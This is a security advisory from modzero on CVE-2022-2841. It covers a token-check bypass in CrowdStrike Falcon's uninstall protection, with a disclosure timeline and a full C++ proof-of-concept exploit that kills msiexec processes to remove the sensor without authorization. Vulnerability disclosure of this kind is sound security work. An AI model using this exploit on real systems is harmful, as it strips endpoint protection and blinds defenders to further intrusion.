------------------------------------------------------------------v1- modzero Security Advisory [MZ-22-02]: Uninstall Protection Bypass for CrowdStrike Falcon Sensor --------------------------------------------------------------------- CrowdStrike Falcon is a cloud-powered endpoint detection and response (EDR) and antivirus (AV) solution. On each end-device a lightweight managed sensor is deployed and makes use of the cloud-based capabilities. The sensor can be configured with a uninstall protection. It prevents the uninstallation of CrowdStrike Falcon sensor on the end-device without a one-time generated token. Exploiting this vulnerability allows an attacker with administrative privileges to bypass the token check on Windows end-devices and to uninstall the sensor from the device without proper authorization, effectively removing the device's EDR and AV protection. --------------------------------------------------------------------- 1. Timeline --------------------------------------------------------------------- 2022/04 - Found vulnerability in CrowdStrike Falcon Sensor (6.31.14505.0) 2022/06/04 - modzero asked for security contact @ CrowdStrike, because their "report a security bug" page only refered to the hackerone Bug Bounty program. 2022/06/06 - CS answered that modzero can use the hackerone submission page, or send an E-Mail to their support at support@crowdstrike.com. 2022/06/06 - modzero asked if it is okay to send sensitive information about 0day vulnerabilities to support@. modzero also told CS that we are not willing to accept terms & conditions of hackerone, which is why we asked for a direct security contact. 2022/06/06 - CS offered to enroll modzero in a private bug bounty program at hackerone, under the conditions that we are willing to sign a mutual non-disclosure agreement. 2022/06/07 - to prevent further misunderstandings, modzero told CS again, that: * We would like to submit a security related bug. * We don't want to participate in any bug bounty programs. * We are not willing to sign any NDA because WE are the ones, providing information to CS. * We are not willing to accept any sort of terms and conditions that are out of scope of well known hacker ethics. * We only want to get a reliable security contact on their side. Aditionally, modzero sent a link to their current vulnerability disclosure policy. 2022/06/07 - CS told us to send the report to bugs@ for review. 2022/06/13 - CS asked for the report. 2022/06/13 - modzero told CS that we need a little bit more time to finish and double check everything before submitting. 2022/06/29 - modzero sent Security Advisory (draft), Proof of Concept exploit sourcecode, executable and a Screencast video of the PoC to CS. 2022/06/29 - CS told us, that we were testing using only an unsupported version of the Falcon Sensor. CS told us about the error message and that they are not able to reproduce. 2022/07/05 - modzero told CS that the error message can be ignored and refered to the PoC screencast video. We also asked for a recent (14-day trial) version of Falcon Sensor to provide reliable information if the most recent version is still vulnerable or not. 2022/07/05 - CS answered: "We do not provide trial licenses as part of this process, however having tested the PoC on our end with a modern sensor this does not appear to be a valid issue." 2022/07/05 - modzero announced publishing the advisory and exploit code by end of week, asking if the quote of CS "Having tested the PoC on our end with a modern sensor this does not appear to be a valid issue" can be used in our report. 2022/07/06 - CS asking for a meeting between modzero's Sr Leadership and CS to discuss next steps related to the bug bounty disclosure. 2022/07/07 - modzero, again, told CS, that we are not participating in any bug bounty program and that there is no need to discuss NDAs or bug bounty programs. 2022/08/12 - modzero managed to acquire a recent version (6.42.15610) of CrowdStrike Falcon and verified, that the attack is still possible. Furthermore, modzero figured out that the vulnerability (that was rejected by CrowdStrike first) has been silently fixed: The PoC that has been sent to CrowdStrike was flagged as malicious. The msiexec call of the deinstaller was also flagged as malicious. Both "countermeasures" can be circumvented easily, we updated the exploit accordingly. 2022/08/22 - modzero publishes Security Advisory and exploit code, because CrowdStrike was unwilling to set up a cooperative information exchange outside of their NDA-ridden bug bounty program to discuss vulnerabilities in their products. --------------------------------------------------------------------- 2. Summary --------------------------------------------------------------------- Vendor: CrowdStrike Homepage: https://www.crowdstrike.com/endpoint-security-products/falcon-endpoint-protection-enterprise/ Error Class: * CWE-691: Insufficient Control Flow Management (https://cwe.mitre.org/data/definitions/691.html) The code does not sufficiently manage its control flow during execution, creating conditions in which the control flow can be modified in unexpected ways. Products known to be affected: * CrowdStrike Falcon (6.31.14505.0) * CrowdStrike Falcon (6.42.15610) Please note: Other versions might be affected as well, but were not tested by modzero. CVE-ID: CVE-2022-2841 Severity: Medium/4.4 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H) Vendor: CrowdStrike Product: CrowdStrike Falcon Version: 6.42.15610 Attack type: Local Affected Components: Uninstall Protection --------------------------------------------------------------------- 3. Details --------------------------------------------------------------------- CrowdStrike Falcon is a cloud-native antivirus (AV) and endpoint detection and response (EDR) solution for end-devices. A sensor agent is deployed on each end-device, which are then managed and connected with a cloud monitoring system. The "Uninstall Protection" feature allows to lock down devices and prevent device users, including administrators, from removing the sensor agent without a one-time, device-specific maintenance token. During a security analysis modzero was required to uninstall a CrowdStrike Falcon Sensor installation on a Windows workstation without having access to the maintenance token. After analysing the software removal procedure, it was possible to develop an automated proof of concept tool, which corrupts the CrowdStrike Falcon Sensor removal process. As a result, the procedure ignores the maintenance token check. This allows an attacker with administrator rights to uninstall and stop the CrowdStrike Falcon Sensor and its corresponding Windows services without a valid token. --------------------------------------------------------------------- 4. Impact --------------------------------------------------------------------- An attacker with administrative access to a machine, can bypass the "Uninstall Protection" of the CrowdStrike Falcon Sensor. The attack removes the software, leaving the CrowdStrike administrator in the dark about potential attacks on the now unprotected endpoint. This is particularly undesirable, given that this is a cloud-native service where customers expect alerts for security-related actions. --------------------------------------------------------------------- 5. Proof of Concept --------------------------------------------------------------------- The following proof of concept code allows an administrator to remove the CrowdStrike Falcon Sensor without maintenance token: // // CrowdStrike Falcon Sensor // De-Installation Auth-Bypass Proof-of-Concept // // Falcon Sensor is installed with an uninstall protection, to prevent unauthorized administrators // from removing Falcon Sensor. The following Proof-of-Concept exploit allows to bypass the // uninstall protection (token check). This can be used to remove the endpoint's EDR and AV protection. // // References: // - modzero MZ-22-02 Security Advisory // - CVE: CVE-2022-2841 // // Version: 0.3 // Secrecy: CONFIDENTIAL // Copyright 2022, modzero AG, Wartstr. 20, 8400 Winterthur, Switzerland // // Usage example: // .\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi' // #pragma once #define _CRT_SECURE_NO_WARNINGS #include #include #include #include #include #include std::list g_msiexec_instances = {}; int g_msiexec_instance_count = 0; void CheckProcess(DWORD process_id) { TCHAR process_name[MAX_PATH] = { 0 }; HANDLE h_proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id); if (nullptr != h_proc) { HMODULE h_mod = 0; DWORD c_need = 0; if (EnumProcessModules(h_proc, &h_mod, sizeof(h_mod), &c_need)) { GetModuleBaseName(h_proc, h_mod, process_name, sizeof(process_name) / sizeof(char)); } } else { return; } if (wcsstr(_wcslwr(process_name), __T("msiexec"))) { bool already_found = ( std::find( g_msiexec_instances.begin(), g_msiexec_instances.end(), process_id) != g_msiexec_instances.end() ); if (!already_found) { g_msiexec_instance_count++; std::cout << "[+] Installer spawned process: " << process_id << std::endl; g_msiexec_instances.push_front(process_id); // If it's the third process, we try to kill it to produce open MSIHandles. // This will break the uninstaller token check. if (g_msiexec_instance_count == 4 || g_msiexec_instance_count == 5) { std::cout << "[+] Killing process: " << process_id << std::endl; if (!TerminateProcess(h_proc, 123)) { std::cout << "[!] Failed to kill process with PID " << process_id << ": " << GetLastError() << std::endl; } if (g_msiexec_instance_count == 5) { std::cout << "[+] Uninstall Protection should be bypassed." << std::endl; exit(0); } } } } CloseHandle(h_proc); } int main(int argc, char* argv[]) { DWORD proc_ids[1024] = { 0 }; DWORD c_need = 0; DWORD c_procs = 0; DWORD i = 0; if (argc != 2) { std::cout << "Usage:" << std::endl << argv[0] << " PATH_TO_CsAgent.LionLanner.msi" << std::endl; return 1; } // increase priority to realtime and start uninstall SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS); std::string path = std::string(argv[1]); unsigned first = path.find("{"); unsigned last = path.find_last_of("}"); std::string guid = path.substr (first,last-first+1); std::string cmd = "start msiexec /x " + guid; system(cmd.c_str()); // now listen for processes popping up while (1) { if (!EnumProcesses(proc_ids, sizeof(proc_ids), &c_need)) { std::cout << "[-] Failed to read processes." << std::endl; return 1; } c_procs = c_need / sizeof(DWORD); // Check every process ID for (i = 0; i < c_procs; i++) { if (proc_ids[i] != 0) { CheckProcess(proc_ids[i]); } } } return 0; } To use the Proof of Concept, the code must be compiled with Visual Studio, and be run as administrator, pointing to `CsAgent.LionLanner.msi` as argument e.g.: .\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi' After executing it, the software removal procedure starts and a popup with an error message, that the token is invalid will show up. After closing the popup, the uninstallation continues and removes all components. --------------------------------------------------------------------- 6. Fix --------------------------------------------------------------------- - n/a --------------------------------------------------------------------- 7. Credits --------------------------------------------------------------------- * Pascal Zenker (parzel) of modzero * Max Moser (mmo) of modzero --------------------------------------------------------------------- 8. About modzero --------------------------------------------------------------------- The independent Swiss-German company modzero assists clients with security analysis in the complex areas of computer technology. The focus lies on highly detailed technical analysis of concepts, software and hardware components as well as the development of individual solutions. Colleagues at modzero work exclusively in practical, highly technical computer-security areas and can draw on decades of experience in various platforms, system concepts, and designs. https://www.modzero.com contact@modzero.com modzero follows coordinated disclosure practices described here: https://www.modzero.com/static/modzero_Disclosure_Policy.pdf. This policy should have been sent to the vendor along with this security advisory. --------------------------------------------------------------------- 9. Disclaimer --------------------------------------------------------------------- The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties concerning this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from using, or reliance on, this information.